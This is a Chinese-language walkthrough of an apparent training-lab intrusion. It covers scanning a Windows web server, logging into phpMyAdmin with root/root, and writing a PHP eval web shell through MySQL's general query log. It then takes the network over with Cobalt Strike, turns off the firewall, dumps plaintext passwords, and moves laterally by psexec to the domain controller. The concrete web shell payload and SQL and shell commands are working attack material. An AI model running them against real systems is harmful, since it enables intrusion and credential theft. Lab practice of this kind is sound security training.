一、环境搭建
官方下载地址及相关信息:漏洞详情
下载后有三台虚拟机,默认密码为:hongrisec@2019
- win7增加一张网卡,一张外网为NAT,另一张内网为VMnet1(仅主机模式)
- Windows server2008和win2K3的配置都是VMnet1:
- 配置好即可登录,登录时提示密码过期需更改密码--->win7需打开phpstudy(外网服务器)
- 主机可以搜索到win7phpstudy探针
- 各机ip如下:
win7 IP:192.168.50.210(外网)
192.168.52.143(内)win2008 192.168.52.138(内)
win2003 192.168.52.141(内)
kali 192.168.50.218(攻击机)
靶场环境搭建完毕。
二、WEB渗透
1、信息收集
- 通过nmap扫描,可以发现开放了80端口和3306端口
nmap -A -p- 192.168.50.210
- 通过dirsearch扫描目录,发现有phpmyadmin,爆破后帐号/密码为:root/root
dirsearch -u http://192.168.50.210/
2、木马植入
- 通过简单查询,获得到网站的绝对路径
- 尝试木马植入,但未果。
- 通过查询得知,secure_file_priv的值为NULL,说明不能使用into outfile的方式写入shell。
- 尝试日志写入shell,查看日志状态,默认为关闭状态:
-
开启日志,并将MYSQL的通用查询日志的输出文件设置为指定的路径:
SET GLOBAL general_log = 'ON'
SET GLOBAL general_log_file = 'C:/phpstudy/www/1.php'
- 写入一句话木马:SELECT '<?php @eval($_POST["cmd"]);?>'
- 植入成功
- 使用蚁剑链接刚刚上传的木马目录
- 上线成功3
3、使用蚁剑+CS
- kali打开服务端,CS链接
- 创建监听器
- 创建Windows可执行exe程序,有效载荷-->win可执行程序-->监听器选择刚刚创建的web--->将后门保存到桌面--->利用蚁剑上传到phpstudy/www目录下
- 在蚁剑终端运行:stat web.exe--->上线成功
三、内网渗透
1、提权:administrator-->system
- 顺便改一下回连间隔,改为5
- 上线后关闭防火墙
shell netsh advfirewall set allprofiles state off
2、内网信息收集
- 查看网络适配器 shell ipconfig
- 查看本地用户 shell net user
- 查看计算机名 shell net view
- 查看有几个域 shell net view /domain
- 抓取明文密码:右击system--->凭证提权--->抓取明文密码
3、内网横向
kali端口扫描的时候发现开放了445端口,可以在CS上创建SMB监听隧道。
SMB(全称是Server Message Block)是一个网络协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。
- 建立SMB监听器
- 切换攻击目标列表--->右击--->横向移动--->psexec
成功进入域控